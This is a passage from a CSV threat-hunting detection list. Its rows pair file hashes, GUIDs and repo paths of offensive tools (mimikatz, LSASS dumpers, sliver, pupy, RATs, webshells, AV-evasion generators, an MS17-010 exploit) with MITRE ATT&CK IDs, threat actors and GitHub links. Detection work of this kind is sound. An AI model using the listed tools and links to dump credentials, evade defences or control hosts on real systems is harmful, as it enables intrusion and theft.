Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - 
DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34733" "*b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803*",".{0,1000}b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34734" "*b4dc2fcd506a9878c5fb8e8b08a47c1e810eb48465a6b489bc4b5003711b0522*",".{0,1000}b4dc2fcd506a9878c5fb8e8b08a47c1e810eb48465a6b489bc4b5003711b0522.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34735" 
"*b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd*",".{0,1000}b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34736" "*b4ed9c347e748f0fac2c3e75852373c08fdde68ec741c45109e8afd7c3381f0d*",".{0,1000}b4ed9c347e748f0fac2c3e75852373c08fdde68ec741c45109e8afd7c3381f0d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34737" "*b4ef4d10245cb81ac244e6fb545cc76a5fad1ac79eedbcec69b932765d5f29d8*",".{0,1000}b4ef4d10245cb81ac244e6fb545cc76a5fad1ac79eedbcec69b932765d5f29d8.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","34738" 
"*b4f113933c223da5cfbb72f5a4ff0c3b1bf54c0d25e56045dea7621ea1021d38*",".{0,1000}b4f113933c223da5cfbb72f5a4ff0c3b1bf54c0d25e56045dea7621ea1021d38.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34740" "*b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0*",".{0,1000}b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","#filehash","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","34742" "*b4fe69c527b9455500142ea58f2a16af2eb9fdfcc7d63079ccf9cb463025ee97*",".{0,1000}b4fe69c527b9455500142ea58f2a16af2eb9fdfcc7d63079ccf9cb463025ee97.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34744" "*b4ff3bf45fd871b6b6ca158a8890254db5be51ca6aaae3b1559a761caefc80be*",".{0,1000}b4ff3bf45fd871b6b6ca158a8890254db5be51ca6aaae3b1559a761caefc80be.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34745" "*b4rtik/ATPMiniDump*",".{0,1000}b4rtik\/ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","34747" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34748" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34749" "*b4rtik/SharpMiniDump*",".{0,1000}b4rtik\/SharpMiniDump.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","34750" 
"*b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a*",".{0,1000}b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","34751" "*b504d1a33068b6bde4059071fd7c89d8f9535185f6aad0d1e1361259f66fb529*",".{0,1000}b504d1a33068b6bde4059071fd7c89d8f9535185f6aad0d1e1361259f66fb529.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34753" "*b5072f210606f0fcf08e88c188e92ed4df8a35b1811008262401b664268f1f6f*",".{0,1000}b5072f210606f0fcf08e88c188e92ed4df8a35b1811008262401b664268f1f6f.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34754" "*b50db46d79c02f7ceca2ee8dfd3a9767b897089a3777632c061e1f79662892b1*",".{0,1000}b50db46d79c02f7ceca2ee8dfd3a9767b897089a3777632c061e1f79662892b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34756" "*b50fdc8caa85dadb573564b7ab742bb7dfdf0062b3f639adf677d698ec0c81c2*",".{0,1000}b50fdc8caa85dadb573564b7ab742bb7dfdf0062b3f639adf677d698ec0c81c2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34757" "*b5122cb03f986f687d1baae60cf8fb683ea112dfddb6589f9713f964edbabef0*",".{0,1000}b5122cb03f986f687d1baae60cf8fb683ea112dfddb6589f9713f964edbabef0.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34758" "*B5205EBA-EC32-4C53-86A0-FAEEE7393EC0*",".{0,1000}B5205EBA\-EC32\-4C53\-86A0\-FAEEE7393EC0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - 
T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34759" "*b52197072372512053ebf764300a93a6e7957a257cd6524a1458bbafc4dcb33f*",".{0,1000}b52197072372512053ebf764300a93a6e7957a257cd6524a1458bbafc4dcb33f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34760" "*b52b7a516a2db79a0f025b4163e6c90468fd7b176114adf6277af4677879de8c*",".{0,1000}b52b7a516a2db79a0f025b4163e6c90468fd7b176114adf6277af4677879de8c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34762" "*b52bf0de684c3d760b7422000c16116af30392da82723239f25a2007e03ee9e4*",".{0,1000}b52bf0de684c3d760b7422000c16116af30392da82723239f25a2007e03ee9e4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34763" "*B52E2D10-A94A-4605-914A-2DCEF6A757EF*",".{0,1000}B52E2D10\-A94A\-4605\-914A\-2DCEF6A757EF.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","34764" "*b5309c785e75feec7be157b0965444e2b2b0d4c592769f20589a3218f32151c0*",".{0,1000}b5309c785e75feec7be157b0965444e2b2b0d4c592769f20589a3218f32151c0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34765" "*b5353522d8bc03a2af708da3c93bb2f21d0b3bc9a158018b4613c3b66725aad4*",".{0,1000}b5353522d8bc03a2af708da3c93bb2f21d0b3bc9a158018b4613c3b66725aad4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34766" "*b538808beaa60c3bc7ed3a900242e0ddfbd8b66f38b7df9c1e85f9e892b3efec*",".{0,1000}b538808beaa60c3bc7ed3a900242e0ddfbd8b66f38b7df9c1e85f9e892b3efec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 
- TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34767" "*b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb*",".{0,1000}b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34769" "*b540f94a9f462bc217673faf2d247cb4b9b3eb44ae3307890dc6cda3aa3e5bb2*",".{0,1000}b540f94a9f462bc217673faf2d247cb4b9b3eb44ae3307890dc6cda3aa3e5bb2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","34770" "*b54792e5bf55da77fb025772858aee457ee4f679a8363faf35d0397db897b92a*",".{0,1000}b54792e5bf55da77fb025772858aee457ee4f679a8363faf35d0397db897b92a.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","34771" 
"*b549aa579ebc29e5813a950f8ecd0af5cd17752da9fb2129824ef490b82c31d3*",".{0,1000}b549aa579ebc29e5813a950f8ecd0af5cd17752da9fb2129824ef490b82c31d3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34772" "*b54ab14a7ad0460c7ac6416a9ad01e7015d32573571114b569f4769a2eb12e70*",".{0,1000}b54ab14a7ad0460c7ac6416a9ad01e7015d32573571114b569f4769a2eb12e70.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","34773" "*b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd*",".{0,1000}b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34774" "*b55327db315e4dee5dd8c93b20b5d503613d64a2e1b181263f4715c6c312bb7c*",".{0,1000}b55327db315e4dee5dd8c93b20b5d503613d64a2e1b181263f4715c6c312bb7c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34775" "*b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd*",".{0,1000}b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34776" "*B5627919-4DFB-49C6-AC1B-C757F4B4A103*",".{0,1000}B5627919\-4DFB\-49C6\-AC1B\-C757F4B4A103.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","34778" "*b568e1b6cad25bc604735e958975fd0471c60ddec52368f36e204f83e8cbd5e1*",".{0,1000}b568e1b6cad25bc604735e958975fd0471c60ddec52368f36e204f83e8cbd5e1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34780" "*b56d067b0f6c9368f044d12bc73bd55da36bc766f60409f219cc77100d7f5ba3*",".{0,1000}b56d067b0f6c9368f044d12bc73bd55da36bc766f60409f219cc77100d7f5ba3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","34781" "*b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d*",".{0,1000}b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34782" 
"*b5822ac44575655904ac07d44997d0c552a13786e2962ad6fe4813b8146e679e*",".{0,1000}b5822ac44575655904ac07d44997d0c552a13786e2962ad6fe4813b8146e679e.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","34785" "*B58767EE-5185-4E99-818F-6285332400E6*",".{0,1000}B58767EE\-5185\-4E99\-818F\-6285332400E6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#GUIDproject","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34787" "*b58a654ad8e0c13d821b1c88a84ce3d9a436a563f8c9c5063b2dae0184b91b22*",".{0,1000}b58a654ad8e0c13d821b1c88a84ce3d9a436a563f8c9c5063b2dae0184b91b22.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","34788" "*b58ac9e4804b66b9a7f7000923454b3b5cabfe991bfb99ae7b6d89fd4b2cab0b*",".{0,1000}b58ac9e4804b66b9a7f7000923454b3b5cabfe991bfb99ae7b6d89fd4b2cab0b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34789" "*b58d48c4e18ca596bea2b23eb26a6fde046f71fadb6f179ddf6734353e5e00ba*",".{0,1000}b58d48c4e18ca596bea2b23eb26a6fde046f71fadb6f179ddf6734353e5e00ba.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34790" "*b58e5bd0a4f4691d791c3fc90885d0c36daf28b4d22a8a04d25f4cd221fb1517*",".{0,1000}b58e5bd0a4f4691d791c3fc90885d0c36daf28b4d22a8a04d25f4cd221fb1517.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34791" 
"*B59C7741-D522-4A41-BF4D-9BADDDEBB84A*",".{0,1000}B59C7741\-D522\-4A41\-BF4D\-9BADDDEBB84A.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34793" "*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*",".{0,1000}B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","34795" 